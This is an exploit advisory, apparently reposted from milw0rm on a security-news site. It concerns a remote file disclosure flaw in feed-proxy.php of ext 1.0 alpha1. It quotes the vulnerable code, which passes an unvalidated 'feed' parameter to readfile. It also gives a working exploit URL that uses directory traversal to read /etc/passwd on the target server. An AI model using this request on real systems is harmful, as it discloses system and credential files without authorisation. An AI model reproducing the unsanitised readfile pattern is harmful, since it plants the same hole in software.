Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  PHP-Ring Webring System 0.9 Remote SQL Injection Vulnerability

  Maran PHP Forum (forum_write.
php) Remote Code Execution Vulnerability

  JChit counter 1.0.0 (imgsrv.php ac) Remote File Disclosure Vulnerability

  GPB bulletin board Remote file include

From:Alkomandoz Hacker <alkomandoz-hacker_(at)_hotmail.com>
Date:30.04.2007
Subject:ext 1.0 alpha1 (feed-proxy.php) Remote File Disclosure

#  ext 1.0 alpha1 (feed-proxy.php) Remote File Disclosure
# D.Script: http://yui-ext.com/deploy/ext-1.0-alpha1.zip
# Discovered by: Alkomandoz Hacker
# Homepage: http://www.asb-may.net - mohandko.com - sniper-sa.com - tryag.com
# V.Code In /examples/layout/feed-proxy.php

----------------------------------------------------------

header('Content-Type: text/xml');
      readfile($feed);
      return;
}
?>

----------------------------------------------------------

# Exploit:[Path_ext]/examples/layout/feed-proxy.php?feed=http../../../../../..
/etc/passwd

# Greetz To: AsbMay's Group & City Of Ghost Team

# milw0rm.com [2007-04-25]

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru
test server